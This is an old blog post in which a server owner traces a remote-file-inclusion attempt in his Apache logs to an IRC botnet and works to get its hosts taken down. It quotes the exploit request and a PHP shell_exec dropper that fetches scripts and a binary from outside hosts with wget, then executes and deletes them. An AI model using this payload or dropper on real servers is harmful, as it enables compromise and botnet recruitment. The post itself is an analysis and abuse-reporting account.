Selling cookie info to third-parties is a classic example of you can make money without doing evil.
RSS

The MUIE Botnet

2007/01/23 filed under /web

Looking at your Apache logfiles can be fun. A lot of annoying people try to do all kinds of crazy stuff. Today I noticed this GET request:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://electrafusion.com/c.txt?? 
  + HTTP/1.1

Since I'm not a fan of PHP, chances are I don't have this file. And yup, I was correct. I didn't have that file. But the URI in there made me curious. What is that c.txt doing exactly?

<?
shell_exec('cd /tmp;wget http://electrafusion.com/botek.txt;
   + mv botek.txt .sessx;perl .sessx;rm botek.txt.*;
   + wget http://saids.com/a;chmod +x a;
   + mv a sess_vttn737j6k0mci66akhs5u1261;
   + ./sess_vttn737j6k0mci66akhs5u1261;
   + rm a*');
...
?>

Ah! Nice. Go to /tmp, download botek.txt from the same server (see below), move that file to .sessx and execute it. Then delete the botek.txt file, get yet another file (now from saids.com, but a non-existing file...) execute that too and delete everything.

The script is a little longer, but basically it's trying various ways to get and launch these additional files.

So what does botek.txt exactly do? It opens an IRC connection a Bucharest.RO.EU.Ultra-Chat.Org. On that server (83.170.75.108), it joins the channel #muie and starts listening for commands from two nicknames (fazanul and Sorin ... our 1337 script kiddie). This in fact is rather dangerous. I doubt this botnet will be tremendously big, yet of course this "über hacker" will keep a list of vulnerable hosts. (To you system admins: check if your Savant2_Plugin_textarea.php is vulnerable!).

I found a real easy way to get protected agains these a**h*les though. Just login to the IRC server, join #muie with a nickname like MUIE|X|\d+ (where \d+ is a random number ;-) and mock this script kiddie' Perl knowledge. Call him script kiddie and they'll ban your IP within a minute. Woohoo! Now my server is safe from them, for my server can't login to the channel ;)

Anyways, after spending some time in the channel, I noticed quite a few of vulnerable hosts already as this picture shows:

Sad but true ...

So who's hosting these files?

$ host electrafusion.com
electrafusion.com has address 208.179.58.67
electrafusion.com mail is handled by 10 electrafusion.com.

$ gwhois 208.179.58.67
Process query: '208.179.58.67'
[...]
OrgName:    Tierzero 
OrgID:      TIERZ
Address:    700 Wilshire Blvd.
Address:    Suite 600
City:       Los Angeles
StateProv:  CA
PostalCode: 90017
Country:    US
[...]
OrgTechHandle: TECHT-ARIN
OrgTechName:   TECH-TIERZERO 
OrgTechPhone:  +1-213-284-0555
OrgTechEmail:  ipnetworkops@tierzero.net
[...]

Start complaining! ;-) I already contacted TierZero, yet I haven't received any replies, and the files are still online :-(

The most ironic thing about this script kiddie is actually the last line of the botek.txt:

# NOTE: DONT REMOVE COPYRIGHTS

Update: TierZero did act on this botnet now:

PING electrafusion.com (208.179.58.67): 56 data bytes
36 bytes from hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130): 
Communication prohibited by filter
Vr HL TOS  Len   ID Flg  off TTL Pro  cks      Src      Dst
 4  5  00 5400 a156   0 0000  38  01 b149 xxx.xxx.xxx.xxx  208.179.58.67 

--- electrafusion.com ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

Of course I had to tell this Sorin about this news and this is what our conversation was like:

Sorin: w
... thinking I was a zombie, he wanted to see who was online

Me: hahaha where did electrafusion.com go? ;-P
Sorin: bitch

Update: As expected, the script kiddie found a new webserver to download the bot scripts from: http://www.depdiknas.go.id/c.txt

The domain resolves to 222.124.249.2, which belongs to TELKOMNET. abuse@telkom.net.id has been informed and hopefully will respond fast.

I figured I'd also might be able to get the IRC server gone: 

$ host Bucharest.RO.EU.Ultra-Chat.Org
Bucharest.RO.EU.Ultra-Chat.Org has address 83.170.75.108

$ gwhois 83.170.75.108
Process query: '83.170.75.108'
[...]
% Information related to '83.170.64.0 - 83.170.79.255'

inetnum:        83.170.64.0 - 83.170.79.255
netname:        UK2-NET
descr:          UK2.NET - UK's biggest host
country:        GB
admin-c:        BB963-RIPE
tech-c:         BB963-RIPE
rev-srv:        ns1.uk2.net
rev-srv:        ns2.uk2.net
status:         ASSIGNED PA
mnt-by:         AS13213-MNT
source:         RIPE # Filtered
[...]

This ISP has also been informed.

Update (2007/01/12): The botnet seems to have crumbled! Woohoo! 

$ lwp-request -m HEAD http://www.depdiknas.go.id/c.txt
403 Forbidden
[...]

Now that the initial script cannot be called anymore, let's see what we have in our beloved #muie channel:



There's but 2 "users" in there (yes, antimuie is me ;-). Even the fanazul and Sorin nicks are no longer logged in.

Victory!

TT , , , , , , , ,
Posted by: B10m | permanent link | comments (5)

Trackbacks

"Security Ripcord" mentioned this post in "Botnets Spreading Via PHP Version all_most_happened_to_me":

I know that botnets spreading by vulnerabilities in PHP is not new news. It is however the first time that I have noticed it on my site. So I have been targeted...along with the rest of the planet.

"ha.ckers.org" mentioned this post in "Botnet Destruction - A Drama":

This is actually pretty interesting because he takes it from the very first step (detecting the attack) to logging into the IRC server, to communicating with the OPs, trying to get himself banned to prevent his IP of his server from communicating with the IRC server, to taking down the individual servers that were hosting the files as well as taking down the IRC server.

"Security Ripcord" mentioned this post in "Interview with B10m":

As I stated in a previous post, I have been paying a little more attention to the information provided in URI and Refer sections provided by one of my Wordpress plugins. This information has, at times, contained information about some systems on the I...

Comments

Brian wrote at 2007-01-08 18:14:

Wow, you've to me tailing my log files right now to see what comes up over the course of the day. I jumped into that IRC channel and they tried to issue commands to me which of course didn't work. Wanna go in and gang up on the wimps? ;)

B10m wrote at 2007-01-08 20:32:

Glad I inspired you. The commands can only be issued by the script kiddies (nicknames are hardcoded). But at least TierZero acted on this!

$ ping electrafusion.com

PING electrafusion.com (208.179.58.67) 56(84) bytes of data.
From hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130) icmp_seq=1 Packet filtered

Sorin wrote at 2007-01-13 14:22:

Now that I found out your site, you are goink to be raedy for a worold of pain! Be prepared to goink off-link in a couple od days. I warned you.

YorHel wrote at 2007-01-13 23:05:

Haha, scriptkiddies take over the world!

I have been analyzing these scripts and vulnerabilities quite some time (yes, I'm also a "logfilefreak"). And I actually held a presentation about a similar script a few weeks ago. Still, it'll take a long time before they can hurt alert sysadmins.

@Sorin: I assume scriptkiddies.nl is not your website. If it is, you really are stupid. :-)

dick wrote at 2007-02-26 01:03:

Thought you should know I was the unfortunate owner of electrafusion. The server was hacked and of course I did not know being out of town.
I immediately took it off line.
Hmmm tierzero did not contact me.
I found this blog only when googling on c.txt
I did note other servers hacked and took them out and wiped also..
Apologize for the trouble and now we are much more savvy and bumped up the level of security on the servers.

Regards and keep up the good work.. and remember the poor blokes who get hacked often do not know it.
THey replaced crond in this case and of course wiped the syslogs..

Comments are closed for this story.
Trackbacks are closed for this story.
return-member